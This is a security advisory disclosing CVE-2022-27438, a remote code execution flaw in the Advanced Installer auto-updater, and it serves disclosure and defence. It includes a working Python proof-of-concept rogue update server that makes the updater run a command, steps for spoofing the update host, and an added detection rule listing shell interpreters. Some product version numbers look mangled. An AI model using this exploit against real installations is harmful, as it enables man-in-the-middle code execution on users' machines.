Caphyon Ltd Advanced Installer 19.3 “CustomDetection” Update Check Remote Code Execution Vulnerability
- Title: Caphyon Ltd Advanced Installer 19.3 “CustomDetection” Update Check Remote Code Execution Vulnerability
- Vendor Advisory: Important Security Updates for the Advanced Installer Auto Updater
- Release mode: Coordinated Release
- Class: Download of Code Without Integrity Check [CWE-494]
- Affected Products: Advanced Installer 19.3 and earlier, and all products that use the updater from Caphyon Ltd Advanced Installer, Advanced Updater.
- Remotely Exploitable: Yes
- Locally Exploitable: Yes
- Severity: Critical - 9.6 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
- CVE Identifier: CVE-2022-27438
- Products tested to be vulnerable:
- 3CX Ltd Call Flow Designer 18.2.13 (TLS)
- 3CX Ltd CRM Template Generator 2.1.23 (TLS)
- BoomTV Inc Streamer Portal 2.2.1 (TLS)
- Caphyon Ltd Advanced Installer 19.3 (TLS)
- Code Sector Direct Folders 4.0 (TLS)
- Code Sector TeraCopy 3.8.5 (TLS)
- Emurasoft Inc EmEditor 21.3.0
- ESI Technology Ltd ESI-USB Software 220.127.116.11
- Flamory Flamory 18.104.22.168 (TLS/elevated)
- Freesnippingtool.com Free Snipping Tool 22.214.171.124 (TLS)
- FxSound LLC FxSound 126.96.36.199 (TLS)
- Gainedge Software Better Explorer 2020.3.15.1304 (TLS)
- Gamecaster Pte Ltd Gamecaster 4.0.2109.2802 (TLS/elevated)
- GuzoGo Travel PLC GuzoGo: Compare and Book Flight Tickets 188.8.131.52
- Honeygain Honeygain for Windows 0.10.7.0 (TLS)
- JKI Soft VI Package Manager 21.1.2754
- JP Software Inc Take Command 28.2.18 (TLS)
- KRyLack Software KRyLack Archive Password Recovery 3.70.69
- KRyLack Software Asterisks Password Decryptor 3.31.107
- KRyLack Software Burning Suite 1.20.05
- KRyLack Software RAR Password Recovery 3.70.69
- KRyLack Software Volume Serial Number Editor 2.02.34
- KRyLack Software ZIP Password Recovery 3.70.69
- Mailbird Inc Mailbird 184.108.40.206 (TLS)
- Moon Software Password Agent 20.10.1
- Nefarius Software Solutions e.U. ScpToolkit 220.127.116.1110 (TLS)
- Nefarius Software Solutions e.U. ViGEm Bus Driver 1.16.116 (TLS)
- Parade Technologies Ltd USB 3.0 to VGA/DVI/HDMI Driver 2.1.36287.0
- Plagiarism Checker X 8.0.6 (TLS)
- Prusa Research a.s. Slicer 2.4.2 (TLS)
- RealDefense LLC MyCleanID 4.1.4 (elevated)
- RealDefense LLC MyCleanPC 4.0.2 (TLS/elevated)
- RealDefense LLC MyPassLock 1.9.6
- Rovio Entertainment Ltd Angry Birds Space 1.4.1
- Rovio Entertainment Ltd Bad Piggies 1.3.0
- RST Instruments Ltd DT Logger Host Software 18.104.22.168
- RST Instruments Ltd Inclinalysis Digital Inclinometer Software 2.48.9
- RST Instruments Ltd IPI Utility Software 1.05.0
- RST Instruments Ltd Readout Host Software 22.214.171.124
- RST Instruments Ltd RSTAR RTU Host Software 1.33.0
- RST Instruments Ltd Tilt Meter Host Software 1.20.1
- RST Instruments Ltd VW0420 Vibrating Wire Isolated Analog Interface Software 1.33.0
- SplitmediaLabs Ltd XSplit Express Video Editor 3.0.2001.801 (TLS)
- UrbanVPN VPN for Windows 2.2.5 (TLS)
- Virtual Desktop Inc Virtual Desktop Streamer 1.20.16 (TLS)
- VpnHood VpnHood Client for Windows 2.4.299 (TLS)
Affected products perform their update check either unauthenticated through HTTP or through TLS/HTTPS. Moreover, some updaters run as an administrative user at high integrity. As a result, depending on the affected product the CVSS score differs:
- Unauthenticated/HTTP, elevated: 9.6 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
- Unauthenticated/HTTP: 8.8 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- TLS, elevated: 8.8 (CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)
- TLS: 8.0 (CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
This vulnerability allows remote attackers to execute arbitrary code on the affected installations of Caphyon Ltd Advanced Installer and all products that use the updater from Caphyon Ltd Advanced Installer, Advanced Updater. A man-in-the-middle position is required to exploit this vulnerability. User interaction is required in that the user has to proceed past the Windows untrusted certificate security alert (only for updaters using TLS).
The specific flaw exists in the updater of Advanced Installer, which insufficiently authenticates its update server. An attacker can spoof these update servers and leverage this vulnerability to execute code in the context of the current user.
Root Cause Analysis
The vulnerability is caused by the updater of Advanced Installer: Advanced Updater, part of Caphyon Ltd Advanced Installer.
From the Advanced Installer User Guide we find that the updater allows for specifying an alternate update check using the CustomDetectionParameter in the requested update configuration.
By default, the update check is triggered automatically after starting the application and with a 2 day interval, and manually through the application menu or executing the update binary.
In the case of Advanced Installer 19.3, the update requests https://www.advancedinstaller.com/downloads/updates.ini, which can contain a specified CustomDetection (any binary on the local system) and CustomDetectionParameter (its parameters), which the application executes in the context of the current user.
Proof of Concept
The below script is used as a proof of concept. For affected products that request an update over HTTP, skip the ssl.wrap_socket call and change the port to 80.
```python
#!/usr/bin/env python3
# Proof of concept script for Caphyon Ltd Advanced Installer "CustomDetection" Update Check Remote Code Execution Vulnerability
# See report for details.
#
# Generate self-signed certificate using e.g.
# > openssl req -new -x509 -keyout www.advancedinstaller.com.pem -out www.advancedinstaller.com.pem -days 365 -nodes -subj "/CN=www.advancedinstaller.com"
#
# Author: Gerr.re

from http.server import BaseHTTPRequestHandler, HTTPServer
import ssl

# CustomDetection with CustomDetectionParams is executed after receiving the response.
# Note that we set exitcode != 0 s.t. the updater thinks there is no new update (so no visual feedback on exploit).
# Raw bytes literal so the Windows path backslashes are not treated as escape sequences.
updateconfig = rb''';aiu;
[Update]
Name = Caphyon Ltd Advanced Updater CustomDetection Update Check Remote Code Execution Vulnerability
URL = http://example.com/doesnotmatter
Size = 1024
CustomDetection = c:\windows\system32\cmd.exe
CustomDetectionParams = /c "c:\windows\system32\calc.exe && exit 1"
'''


class HTTPHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Only the update configuration request is answered; everything else gets a 404.
        if "updates.ini" in self.path:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(updateconfig)
        else:
            self.send_response(404)
            self.end_headers()


if __name__ == "__main__":
    print("Running Server")
    try:
        httpd = HTTPServer(("0.0.0.0", 443), HTTPHandler)
        # ssl.wrap_socket was removed in Python 3.12; on newer interpreters use
        # ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) with load_cert_chain() and its wrap_socket() instead.
        httpd.socket = ssl.wrap_socket(httpd.socket, server_side=True,
                                       certfile='www.advancedinstaller.com.pem',
                                       ssl_version=ssl.PROTOCOL_TLS)
        httpd.serve_forever()
    except KeyboardInterrupt:
        httpd.server_close()
```
This proof of concept was tested on target Windows 10 21H2 with Caphyon Ltd Advanced Installer 19.3 installed, and attacker Ubuntu 20.04.3 LTS.
Steps to reproduce
For other affected products, you have to change the update server and update configuration filename. These can often be found in the updater .ini in the application installation directory.
- Install Advanced Installer 19.3;
- Spoof www.advancedinstaller.com to our attacker IP;
  - For the proof of concept it is easiest to edit c:\windows\system32\drivers\etc\hosts on the target.
  - Attackers may e.g. use:
    - poorly configured routers/switches/DNS
    - DNS spoof / cache poisoning
    - ARP spoof / cache poisoning
- Generate self-signed certificates;
  - e.g. using openssl req -new -x509 -keyout www.advancedinstaller.com.pem -out www.advancedinstaller.com.pem -days 365 -nodes -subj "/CN=www.advancedinstaller.com"
- Run the proof of concept script on the attacker;
- Start Advanced Installer to trigger the update automatically, or
  - wait for 2 days to trigger the update automatically, or
  - trigger the update manually through the application menu/settings, or
  - trigger the update manually by starting the update application at C:\Program Files (x86)\Caphyon\Advanced Installer 19.3\bin\x86\updater.exe;
- Proceed with the Windows untrusted certificate security alert (if applicable).
As a result, the binary specified in CustomDetection with the parameters specified in CustomDetectionParameters is executed in the context of the current user.
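A successful exploit leaves a clear trace in endpoint telemetry: the update binary (updater.exe, the path given in the steps above) spawning cmd.exe or another interpreter, which a legitimate update check has no reason to do. The detection logic below is an added example written for this page, not part of the advisory or of any vendor's tooling. The events are constructed process-creation records in a pipe-delimited shape; the field layout, the second product path C:\Program Files\Product and the set of interpreter names are assumptions, and products that rename the updater binary would need UPDATER_NAMES extended.

```python
"""Detect the Advanced Updater binary spawning a shell/interpreter (added example, not from the advisory)."""
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed sample events: ts|user|parent_image|image|command_line (command line is always last).
SAMPLE_EVENTS = r"""
2022-06-01T10:00:01Z|ACME\alice|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe
2022-06-01T10:00:07Z|ACME\alice|C:\Program Files (x86)\Caphyon\Advanced Installer 19.3\bin\x86\updater.exe|C:\Windows\System32\cmd.exe|cmd.exe /c "c:\windows\system32\calc.exe && exit 1"
2022-06-01T10:00:09Z|ACME\alice|C:\Program Files (x86)\Caphyon\Advanced Installer 19.3\bin\x86\updater.exe|C:\Users\alice\AppData\Local\Temp\product-setup.exe|product-setup.exe /S
2022-06-01T10:01:30Z|ACME\bob|C:\Program Files\Product\updater.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoProfile -Command Get-Date
"""

# Image names of updaters in scope (updater.exe is the name on the page; others are assumptions to extend).
UPDATER_NAMES = {"updater.exe"}
# Children an update check should never need; any of these under an updater parent is an alert.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}


@dataclass
class ProcessEvent:
    ts: str
    user: str
    parent_image: str
    image: str
    command_line: str


@dataclass
class Alert:
    ts: str
    user: str
    parent_image: str
    image: str
    reason: str


def parse_events(text: str) -> list:
    """Split the constructed pipe-delimited log into ProcessEvent records, skipping blank lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("|", 4)  # maxsplit keeps any '|' inside the command line intact
        if len(parts) != 5:
            continue  # malformed record; a real pipeline would count these
        events.append(ProcessEvent(*parts))
    return events


def is_updater_spawning_interpreter(ev: ProcessEvent) -> bool:
    """Rule: parent basename is an updater and child basename is a shell/interpreter (case-insensitive)."""
    parent = PureWindowsPath(ev.parent_image).name.lower()
    child = PureWindowsPath(ev.image).name.lower()
    return parent in UPDATER_NAMES and child in INTERPRETERS


def scan(text: str) -> list:
    """Run the rule over a log and return one Alert per matching event."""
    alerts = []
    for ev in parse_events(text):
        if is_updater_spawning_interpreter(ev):
            alerts.append(Alert(ev.ts, ev.user, ev.parent_image, ev.image,
                                f"updater spawned {PureWindowsPath(ev.image).name}: {ev.command_line}"))
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.ts}] {a.user}: {a.reason}")
```

Of the four constructed events only the second and fourth fire: a user-launched cmd.exe under explorer.exe and an updater launching a downloaded setup binary are left alone. Matching on basenames rather than full paths keeps the rule valid across the differing install directories of the products listed in this advisory.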
The vulnerability presents itself because there is insufficient authentication from the update server. This vulnerability is fixed in Advanced Installer 19.4.
We recommend that vendors of affected products rebuild the product using Advanced Installer 19.4 and release this update as soon as possible, mentioning the update and CVE-2022-27438 in the changelog.
We recommend that users of affected products update to a fixed version as soon as possible. Refer to the website of the affected product for updates and changelogs (look for “CVE-2022-27438 fix”).
- 11-02-2022: Initial contact with the vendor via firstname.lastname@example.org.
- 21-02-2022: Vendor releases version 19.2 which is still vulnerable.
- 04-03-2022: Gerr.re sent reminder to email@example.com after no response.
- 18-03-2022: Gerr.re sent a request to Mitre for a CVE ID.
- 18-03-2022: Gerr.re sent final reminder to firstname.lastname@example.org after no response.
- 21-03-2022: Vendor releases version 19.3 which is still vulnerable.
- 21-03-2022: Vendor replies, requesting technical details.
- 21-03-2022: A draft report with technical details and a proof of concept application was sent to the vendor.
- 22-03-2022: Vendor acknowledges reception of technical details.
- 23-03-2022: Vendor confirms the vulnerability.
- 24-03-2022: Vendor shares release candidate 19.4 and requests a retest on the fixes.
- 25-03-2022: Gerr.re confirms the fixes and sends further security recommendations.
- 29-03-2022: Vendor sends questions regarding security recommendations.
- 06-04-2022: Gerr.re sends additional information to answer the questions.
- 26-04-2022: Vendor releases version 19.4 that includes the fixes.
- 28-04-2022: Mitre assigns CVE-2022-27438.
- 01-06-2022: Coordinated release.
- 12-06-2022: Gerr.re sends remarks regarding false assumptions made in the vendor advisory.
- 20-06-2022: Updated public advisory with link to vendor advisory.
The contents of this advisory are copyright © 2022 Gerr.re, and are licensed under a Creative Commons Attribution-NoDerivatives 4.0 International (CC BY-ND 4.0)